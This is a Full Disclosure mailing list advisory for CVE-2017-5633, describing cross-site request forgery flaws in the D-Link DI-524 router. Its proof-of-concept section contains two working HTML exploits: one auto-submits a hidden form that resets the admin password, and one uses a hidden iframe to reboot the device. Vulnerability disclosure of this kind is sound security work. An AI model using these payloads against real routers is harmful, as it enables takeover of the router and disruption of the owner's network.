Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF) vulnerabilities

From: Felipe Soares de Souza <fsouza.researcher () gmail com>
Date: Mon, 27 Feb 2017 19:20:49 -0300
Title:
====

D-link wireless router DI-524 – Multiple Cross-Site Request Forgery (CSRF)
vulnerabilities

Credit:
======

Name: Felipe de Souza

Date:
=====

27-02-2017


Reference:
=====

CVE-2017-5633


Vendor:
======

D-Link is the global leader in connectivity for small, medium and large
enterprise business networking.

Product:
=======

D-Link DI-524 wireless router

Product link: https://dlink.com.br/produto/di-524150

Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in the D-LINK DI-524
wireless router enables an attacker to perform [1]device reboot, [2]change
the admin password, [3]possibly have unspecified other impacts via crafted
requests.


Affected Version:
=============

9.01


Exploitation-Technique:
===================

Remote


Details:
=======


An attacker who lures a D-Link DI-524 authenticated user to browse a
malicious
website or clicking in a crafted url can exploit cross site request
forgery (CSRF). The attacker could changing the admin password or rebooting
the device.


Proof Of Concept:
================


[1] User login to DI-524 wireless router


[2] User visits the attacker's malicious web page or clicking in a crafted
link (exploit01.html | exploit02.html)


[3] (exploit01.html) changes the admin password, (exploit02.html)cause
device reboot.



Exploit (exploit01.html):


<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<form method="POST" action="http://192.168.0.1/cgi-bin/pass";>
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="ATTACKER">
<input type="hidden" name="p1" value="ATTACKER">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>

Exploit (exploit02.html):

<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<iframe width="1" height="1" src="
http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status";> </iframe>
</body>
</html>


Credits:
=======

Felipe de Souza - Network Analyst & Programmer

twitter: https://twitter.com/felipes01
Linkedin: https://br.linkedin.com/in/felipe-soares-de-souza-a4332b33

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: